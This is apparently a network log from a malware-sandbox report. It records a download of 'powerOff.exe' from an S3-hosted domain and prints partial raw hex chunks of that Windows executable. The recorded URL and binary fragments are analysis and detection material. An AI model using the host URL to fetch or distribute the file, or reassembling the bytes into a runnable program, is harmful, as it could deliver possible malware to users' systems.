                                                                                                                          2022-05-21 07:32:43 UTC1546OUTGET /widgets/powerOff.exe HTTP/1.1
                                                                                                                          Host: doja-cat.s3.pl-waw.scw.cloud
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:32:43 UTC1557INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 858837
                                                                                                                          x-amz-id-2: txdf00788be59c42bea7872-006288959b
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Last-Modified: Mon, 25 Apr 2022 11:17:09 GMT
                                                                                                                          ETag: "c0538198613d60407c75c54c55e69d91"
                                                                                                                          x-amz-request-id: txdf00788be59c42bea7872-006288959b
                                                                                                                          x-amz-version-id: 1650885429070608
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Date: Sat, 21 May 2022 07:32:43 GMT
                                                                                                                          Connection: close
                                                                                                                          2022-05-21 07:32:43 UTC1557INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                          2022-05-21 07:32:43 UTC1573INData Raw: 29 40 00 10 45 41 63 63 65 73 73 56 69 6f 6c 61 74 69 6f 6e 8d 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 4a 40 00 0c 00 00 00 60 46 40 00 c4 29 40 00 ac 28 40 00 d4 28 40 00 18 29 40 00 0a 45 50 72 69 76 69 6c 65 67 65 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 4b 40 00 0c 00 00 00 60 46 40 00 c4 29 40 00 ac 28 40 00 d4 28 40 00 18 29 40 00 0e 45 53 74 61 63 6b 4f 76 65 72 66 6c 6f 77 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4b 40 00 0c 00 00 00 60 46 40 00 c4 29 40 00 ac 28 40 00 d4 28 40 00 18 29 40 00 09 45 43 6f 6e 74 72 6f 6c 43 8b c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 4b 40 00 0c 00 00 00 60 46 40 00
                                                                                                                          Data Ascii: )@EAccessViolation@J@`F@)@(@(@)@EPrivilegeK@`F@)@(@(@)@EStackOverflowLK@`F@)@(@(@)@EControlCK@`F@
                                                                                                                          2022-05-21 07:32:44 UTC1587INData Raw: ff e8 32 fb ff ff 83 7d 90 00 74 08 8b 45 90 e9 fd 04 00 00 83 7d 94 00 74 0a b8 01 00 00 00 e9 ed 04 00 00 33 d2 89 55 cc 8b 4d f4 8b 45 ec 8d 14 01 89 55 98 eb 30 8b c7 2b c6 3b 45 bc 72 03 03 45 bc 8b 55 c0 8a 04 02 50 8b 4d c0 58 88 04 39 8b 55 98 88 02 ff 45 ec ff 45 98 47 3b 7d bc 75 02 33 ff ff 4d cc 83 7d cc 00 74 08 8b 45 ec 3b 45 0c 72 c2 85 ff 75 0f 8b 55 c0 8b 4d bc 8a 44 0a ff 88 45 eb eb 0a 8b 55 c0 8a 4c 3a ff 88 4d eb 33 c0 33 d2 89 45 90 89 55 94 8b 4d f4 8b 45 ec 8d 14 01 89 55 98 8b 4d ec 3b 4d 0c 0f 83 d8 03 00 00 8b 45 ec 03 45 c8 23 45 e4 89 45 ac 83 7d 90 00 74 08 8b 45 90 e9 43 04 00 00 83 7d 94 00 74 0a b8 01 00 00 00 e9 33 04 00 00 8b c3 8b 55 ac c1 e0 04 03 d2 03 c0 03 45 f0 03 c2 8d 95 7c ff ff ff e8 de fa ff ff 85 c0 0f 85 c1
                                                                                                                          Data Ascii: 2}tE}t3UMEU0+;ErEUPMX9UEEG;}u3M}tE;EruUMDEUL:M33EUMEUM;MEE#EE}tEC}t3UE|
                                                                                                                          2022-05-21 07:32:44 UTC1603INData Raw: 58 d2 53 be e5 1a 2d f5 e9 71 b2 76 3f 75 da 59 e6 f5 12 9e d3 8f fb 97 f4 c7 92 d9 72 c0 eb 25 43 a7 df 1f dd 01 78 c1 eb 65 45 a3 e5 41 47 e7 5d 2a 19 12 91 cb a6 1d 00 11 19 07 8f 05 e6 2b ef 70 2d 63 41 ff 68 a9 ce 68 3b cd f3 ca 78 52 db 4e 91 0f 91 5a b1 66 74 3f ab a7 cb 88 46 5b 98 8e 96 16 bd e0 e4 59 84 37 5d a9 85 a9 88 c8 a5 d1 8b a3 88 8c 43 4a 00 d6 e8 ca 79 de 74 ad 9d fa ef cf da bd d4 8e a6 5c a4 74 4e e4 f4 0e d2 59 ab f5 a7 3f f6 84 ae 13 d1 79 97 c7 82 ff 17 28 01 10 91 4b a6 17 4c 11 f9 cd de d0 a5 27 ad d4 f7 39 39 00 ab 87 95 f0 ac 8c bc 5d 79 c3 c7 16 2f ef 4f 23 f2 9b bd e0 e4 2a ff d3 53 6f 4f 7f 6c b4 64 e8 10 2b 3f 3a ab 8c 48 5d 86 44 e4 42 68 07 40 44 2e 42 ea 96 33 5a a3 9f 82 f7 f5 91 6b b4 a4 e7 74 42 70 de e3 69 1d 84 25
                                                                                                                          Data Ascii: XS-qv?uYr%CxeEAG]*+p-cAhh;xRNZft?F[Y7]CJyt\tNY?y(KL'99]y/O#*SoOld+?:H]DBh@D.B3ZktBpi%
                                                                                                                          2022-05-21 07:32:44 UTC1619INData Raw: 7b a5 b4 4e 3f d7 7a 7d d6 73 0d f6 9a 54 c7 9d 81 9a 86 66 38 3c 7e 9f a6 d5 81 60 99 6a 6e e4 7c 91 8f 9d 82 96 b3 9c dc 7b 5a b0 43 f0 ce e1 9d a7 06 5e 35 35 55 db ea 6c 80 cc ab d4 e5 12 6c 05 28 ed 00 bc c0 82 ff 9f c6 74 5f c0 f8 13 80 25 ba 04 e0 3a 76 38 42 d1 8c cc b5 cc 39 96 b2 8c e5 2c 67 2d cf 8f 27 fa 6e 17 25 6b 79 4e 3f 74 83 bd f4 cb 32 a1 62 c0 d3 36 0d 4d 55 d1 0c 87 34 85 cd 0d 10 99 15 69 f1 61 21 64 6c 95 25 99 f7 f4 b3 9c fe e0 88 e2 c8 f3 64 38 e4 45 5d f3 bc ae a8 94 fc ca 7c 4b 2d 41 af 63 d3 80 7f c2 16 c1 c7 66 dc 09 c0 e8 0e c0 06 dd 69 69 91 b9 15 9c 63 39 cb d9 2e 4b 76 ca 92 6b 65 9f 6b bd 1e 1b 79 41 e1 7d 57 f3 3f ee 1b 95 37 6b 5b 4b 00 ea da ca 80 ea da ba 02 89 cc 80 e3 c1 61 ce b1 90 65 64 de b3 92 17 2c 65 19 65 f0
                                                                                                                          Data Ascii: {N?z}sTf8<~`jn|{ZC^55Ull(t_%:v8B9,g-'n%kyN?t2b6MU4ia!dl%d8E]|K-Acfiic9.KvkekyA}W?7k[Kaed,ee
                                                                                                                          2022-05-21 07:32:44 UTC1635INData Raw: 3a 47 ed 9d ec fe 3f 60 c3 3d 98 75 33 84 28 ed 90 37 29 c0 6a 45 6e 0c b9 b1 eb 59 00 0f 9e c4 81 b6 4a 0a 00 b1 55 4a f5 27 00 4a 93 2b 9d 4e 00 ee fa 45 ed 99 38 9c 00 84 48 08 f2 b6 f7 d0 d5 ce 51 3b c7 ac 49 3f ef 7c a0 72 1d 3e 06 ca 2c e3 f1 68 0c dc 8f 23 ed a1 db cf 50 00 fc b6 98 f3 8f 8b 14 fb 79 b1 5c f0 72 b1 90 af 77 d1 17 89 57 05 80 97 6e 68 d7 ac 4f 00 8c a6 30 06 a3 b4 ac 6b 07 9f 18 07 12 1f 27 05 80 d8 2a d5 9f 00 64 1b 11 20 71 65 9d 7d ed 2f bf b5 5e ba 5f 88 2b 43 1c 08 c0 28 8d 0b 81 45 d3 72 5a 16 9c 16 25 27 45 d1 e7 82 d3 c7 3e 70 21 e0 fa 13 ad 69 d3 30 6b 6a a6 75 c3 6f f3 19 bf cd 25 f6 23 de 37 3c 07 15 fd 20 30 99 03 70 8d 02 ac d2 e4 c6 92 5b 43 66 e4 04 e0 5d 1f 8b 03 b1 11 07 ba 0f 9b 27 77 41 0a 00 b1 55 5a a5 85 4b ae
                                                                                                                          Data Ascii: :G?`=u3(7)jEnYJUJ'J+NE8HQ;I?|r>,h#Py\rwWnhO0k'*d qe}/^_+C(ErZ%'E>p!i0kjuo%#7< 0p[Cf]'wAUZK
                                                                                                                          2022-05-21 07:32:44 UTC1651INData Raw: 05 94 3a 45 a9 1f 94 fa 34 3a ff 6c fa 94 02 80 61 40 02 0d f0 35 31 25 48 de b1 e2 4e 8d f3 01 7c 08 2c 5d cf 9b a6 c1 85 40 eb 3d 56 69 f6 93 84 e9 7d 5f a4 78 c7 38 44 2c 19 16 73 65 92 f0 a4 28 68 9c a3 71 3d 55 d7 73 32 d4 06 bc 1d fa 81 83 92 ae 41 8f 98 1e da fd c6 c1 73 05 5f 4d 67 bc 9c cd 78 52 14 ec 17 05 fb 79 41 91 58 32 63 87 42 73 2d c3 bc 3e 71 4d df f3 ff b3 77 e7 cb 71 5c 59 9e e7 bf e7 7a 78 44 00 e0 aa 25 53 a9 dc b3 aa bb aa ac 7b e6 0f 96 19 67 9e 23 2b 87 a5 51 99 0d 9f 8d 6f a0 54 be c4 18 ab 07 95 55 99 4a 2d 24 c1 05 20 48 ec b1 7b f8 76 ef fc 71 dc 23 02 10 29 91 12 c9 d8 ce c7 da 1b 41 10 c5 74 91 58 ee b9 fe bb e7 1c 8d 86 ec 9c 9d b2 db ed 72 3c 1a d2 cf 52 b2 b2 b4 a7 7c 66 5e bc 40 4f 9c db ab 3a ff 9c 32 e7 ce 3f b3 16 a9
                                                                                                                          Data Ascii: :E4:la@51%HN|,]@=Vi}_x8D,se(hq=Us2As_MgxRyAX2cBs->qMwq\YzxD%S{g#+QoTUJ-$ H{vq#)AtXr<R|f^@O:2?
                                                                                                                          2022-05-21 07:32:44 UTC1667INData Raw: ec 69 f5 be 7a 80 58 dd 31 e8 7d e0 3d e0 32 36 44 cc 2c 39 89 22 9c c5 81 8c f9 21 a6 c3 bc 60 50 b7 f5 04 0e 45 64 0f 91 a7 c0 5e 08 61 8f 40 57 a6 8d 28 ec 8b ca ac 04 db f9 34 2b a3 7a 0a 20 e8 a2 fe 52 75 bd 87 ce 09 f8 09 f0 0b 74 76 c0 ef d0 a7 04 57 ab ab 3d 8f fb 35 e6 c7 08 21 e8 42 bf f4 04 5f 52 8c 53 ca 74 4c 31 4e 2d 0e 64 cc f7 4b d1 9c 7f 1f 8d fb ec 00 0f 80 3d 64 d2 e2 f3 b4 fe 98 28 6e 8c 01 ff d9 ef 6f 59 8b 4f b3 12 ac 00 30 2b ed f6 f6 dd 16 d3 83 c0 bf 06 fe 77 e0 7f e3 db 43 c4 2e c6 82 c0 be 3e cc 92 38 17 07 4a c6 f8 dc e2 40 c6 54 66 77 ec eb 9e fe 1e 18 ce 0c f3 7a 04 fc 17 22 ff 59 bd 3e 05 ce 3e ff d7 4f 93 77 7d b3 c6 bc 2b 16 7d 30 ab ce a3 87 b5 1c f0 1c 68 a2 93 1a f7 98 ce 10 f8 10 2d 12 ae a1 d3 86 1b e8 1c 81 68 0e f7
                                                                                                                          Data Ascii: izX1}=26D,9"!`PEd^a@W(4+z RutvW=5!B_RStL1N-dK=d(noYO0+wC.>8J@Tfwz"Y>>Ow}+}0h-h
                                                                                                                          2022-05-21 07:32:44 UTC1683INData Raw: 9a 5b 86 41 d5 75 59 ca 43 ae d6 6a 34 ba 5d be 8b ba 3c 69 b5 b1 7c 0f 5c 57 33 01 e5 35 0f dc 00 7e 75 9c df 7c dc 00 a0 a8 fe 7f a5 0a 43 35 9a e6 5d 8f 8f a6 a6 b8 12 84 84 96 35 31 c5 50 85 bd 5e 97 4f 37 9f f2 d9 d6 26 5f 6c 6d f2 b4 d5 a6 1d c7 ba f8 8f b9 a2 50 70 a7 d3 e5 b7 4f 1e f3 a8 d9 e0 c9 7c 8b 77 e6 17 78 6f 71 71 62 02 00 28 e6 03 b8 dc 9c 9d c7 34 4c ea f7 ee 72 af be 83 4b 0d b3 9f 01 d0 4c 40 e9 18 1c b4 ea 1f eb 6e 80 17 06 00 6b 1b eb 1e 52 58 b0 80 14 17 d4 de f0 01 d5 10 05 96 45 ad 3f ea f7 82 1f 30 eb ba 38 a6 39 f6 01 40 51 e5 bf d7 eb f1 b4 d5 e2 9b 5d 39 eb bf b3 bb cb 83 46 43 aa c5 d5 44 c8 81 38 4b d9 eb a6 fd 63 1e 83 38 4d 89 b3 8c 46 2f 62 b1 52 61 da f3 c6 ba 4b a0 98 0f e0 5a 16 f3 61 48 9c 65 5c ac 6c f3 a4 d9 a4 9d
                                                                                                                          Data Ascii: [AuYCj4]<i|\W35~u|C5]51P^O7&_lmPpO|wxoqqb(4LrKL@nkRXE?089@Q]9FCD8Kc8MF/bRaKZaHe\l
                                                                                                                          2022-05-21 07:32:44 UTC1699INData Raw: cb 12 02 cf b6 69 39 0e 3d cf 67 dd f7 d9 0c 2a d7 be 7f 18 bd dc 71 dd c5 88 66 87 b6 eb 9a bb fd 57 24 2f 0a f6 c2 39 f7 c6 63 7e b5 b3 c3 97 07 fb 66 f3 6f 16 0a 21 ee 23 f8 02 ad bf e5 35 dc fd 57 bc 96 02 e0 88 17 e0 26 f0 77 94 a7 ff ef 63 66 04 34 82 69 9e 33 5d 98 88 3c 4b 22 28 a3 82 25 e5 43 de 3c ac 9f cf 23 af 80 a4 75 64 f6 7c a5 0c 4c d3 84 7e 18 b2 37 9b f1 70 36 63 7f 3e e7 20 0c 99 24 31 f3 2c 23 2b 1e 65 0b 14 4a 2d 94 01 d0 3c 52 09 94 d6 68 ad cf dc 4f 20 28 0b 1a 79 e4 25 10 48 b1 e8 d5 5f 74 8b 58 42 e2 58 16 ed c5 e6 bf dd 6a 71 a1 dd e6 4a a7 c3 c5 4e 87 ad 56 8b ae eb 99 93 fe 09 a8 de 0f b3 34 e5 fe 64 c2 97 07 07 7c 79 b0 cf cd e1 60 d9 4b 33 bc 1c 47 ef fe ef 0a 21 7f 29 2c f9 dd eb b8 fb af 78 dd 17 6b 0f 28 73 01 be 4f a9 0a
                                                                                                                          Data Ascii: i9=g*qfW$/9c~fo!#5W&wcf4i3]<K"(%C<#ud|L~7p6c> $1,#+eJ-<RhO (y%H_tXBXjqJNV4d|y`K3G!),xk(sO
                                                                                                                          2022-05-21 07:32:44 UTC1715INData Raw: a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a4 a8 4d b0 a3 a6 4c 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca ce 5f
                                                                                                                          Data Ascii: LLLLLLLLLLML_
                                                                                                                          2022-05-21 07:32:44 UTC1731INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fc ff ad b0 62 ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a3 a7 4c c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca ce 5f 14 ca ce 5f fb ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f
                                                                                                                          Data Ascii: bLLLLLLLLLLLLLLLLLLLLLLLLL________________________
                                                                                                                          2022-05-21 07:32:44 UTC1747INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc fc f9 ff a7 aa 57 ff a2 a5 4c ff a2 a5 4c ff ab ae 50 ff c8 cc 5e ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f 0c 00 00 00 00 ca ce 5f db ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f
                                                                                                                          Data Ascii: WLLP^________________________________________________
                                                                                                                          2022-05-21 07:32:44 UTC1763INData Raw: ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f e7 ca ce 5f 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca ce 5f 28 ca ce 5f f3 ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f
                                                                                                                          Data Ascii: ______________________(_(________
                                                                                                                          2022-05-21 07:32:44 UTC1779INData Raw: 00 00 00 00 c9 cd 5e 34 ca ce 5f da ca ce 5f fe c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff c9 cd 5e ff b8 bc 56 fe a3 a6 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c fe a2 a5 4c dd a3 a6 4c 36 00 00 00
                                                                                                                          Data Ascii: ^4__^__^__^__^___^__^__^_^VLLKLLKLLKLLKLKLLKLLKLLKLLKLLKLLKLLLL6
                                                                                                                          2022-05-21 07:32:44 UTC1795INData Raw: a1 a4 4b fe aa ad 4f ff c5 c9 5c ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e d6 ca ce 5f bd ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff c9 cd 5e fe ca ce 5f ff ca ce 5f ff c9 cd 5e fe ca ce 5f ff d1 d4 75 ff fd fd fa fe ff ff ff ff ff ff ff ff fe fe fe fe ff ff ff ff ff ff ff ff fe fe fe fe ff ff ff ff fd fe fc ff be c0 82 fe a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe a2 a5 4c ff a2 a5 4c ff a1 a4 4b fe e2 e2 c7 ff ff ff ff ff fe fe fe fe ff ff ff ff ff ff ff
                                                                                                                          Data Ascii: KO\^__^__^__^__^__^__^__^___^_^__^_uLLLKLLKLLKLLK
                                                                                                                          2022-05-21 07:32:44 UTC1811INData Raw: c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e e9 c9 cd 5e d6 c9 cd 5e bd c9 cd 5e 9b c9 cd 5e 77 c9 cd 5e 4d c9 cd 5e 29 c9 cd 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff f8 00 00 1f ff ff ff ff ff ff ff ff 80 00 00 01 ff ff ff ff ff ff ff fe 00 00 00 00 7f ff ff ff ff ff ff f0 00 00 00 00 0f ff ff ff ff ff ff c0 00 00 00 00 03 ff ff ff ff ff ff
                                                                                                                          Data Ascii: ^^^^^^^^w^M^)^
                                                                                                                          2022-05-21 07:32:44 UTC1827INData Raw: c9 cd 5f ff c9 cd 5f ff c9 cd 5f ff c9 cd 5f ff c9 cd 5f ff c9 cd 5f ff c9 cd 5f ff c9 cd 5f ff c9 cd 5f ff c9 cd 5f 83 c9 cd 5e 58 c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe c9 cd 5e fe de e0 9c fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe f7 f7 f0 fe ae b0 63 fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a4 a7 51 fe f3 f3 e8 fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe f3 f3 e8 fe a4 a7 51 fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe a1 a4 4b fe ae b1 64
                                                                                                                          Data Ascii: __________^X^^^^^^^^^^^^^^^^cKKKKKKKKQQKKKKKKKKd
                                                                                                                          2022-05-21 07:32:44 UTC1843INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f5 f5 ec ff bb be 7d ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c ff a2 a5 4c fd a3 a6 4c 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca ce 5f 0e ca ce 5f df ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff e0 e2 a2 ff fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                          Data Ascii: }LLLLLLLLLLLLLLLLLW_________________
                                                                                                                          2022-05-21 07:32:44 UTC1859INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 01 00 00 00 80 00 00 00 00 00 00 00 01 00 00 00 80 00 00 00 00 00 00 00 01 00 00 00 80 00 00 00 00 00 00 00 01 00 00 00 c0 00 00 00 00 00 00 00 03 00 00 00 c0 00 00 00 00 00 00 00 03 00 00 00 e0 00 00 00 00 00 00 00 07 00 00 00 e0 00 00 00 00 00 00 00 07 00 00 00 f0 00 00 00 00 00 00 00 0f 00 00 00 f0 00 00 00 00 00 00 00 0f 00 00 00 f8 00 00 00 00 00 00 00 1f 00 00 00 f8 00 00 00 00 00 00 00 1f 00 00 00 fc 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:32:44 UTC1875INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca ce 5f 03 ca ce 5f 47 ca ce 5f 9a ca ce 5f e5 ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f ff ca ce 5f e5 ca ce 5f 9a ca ce 5f 47 ca ce 5f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: __G_____________________G_
